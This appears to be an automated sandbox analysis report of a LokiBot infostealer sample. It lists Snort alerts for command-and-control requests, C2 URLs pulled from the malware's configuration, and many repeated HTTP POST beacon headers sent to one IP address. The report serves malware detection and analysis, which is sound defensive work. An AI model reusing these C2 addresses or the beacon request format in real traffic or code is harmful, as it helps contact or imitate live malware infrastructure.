                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49830 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49830 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49830 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49831 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49831 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49831 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49832 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49832 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49832 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49833 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49833 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49833 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49834 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49834 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49834 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49835 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49835 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49835 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49836 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49836 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49836 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49837 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49837 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49837 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49838 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49838 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49838 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49839 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49839 -> 45.77.223.48:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49839 -> 45.77.223.48:80
                        Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                        Source: Malware configuration extractorURLs: http://45.77.223.48/~blog/?ajax=ee
                        Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 176Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 176Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: global trafficHTTP traffic detected: POST /~blog/?ajax=ee HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.77.223.48Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FE983A82Content-Length: 149Connection: close
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.77.223.48
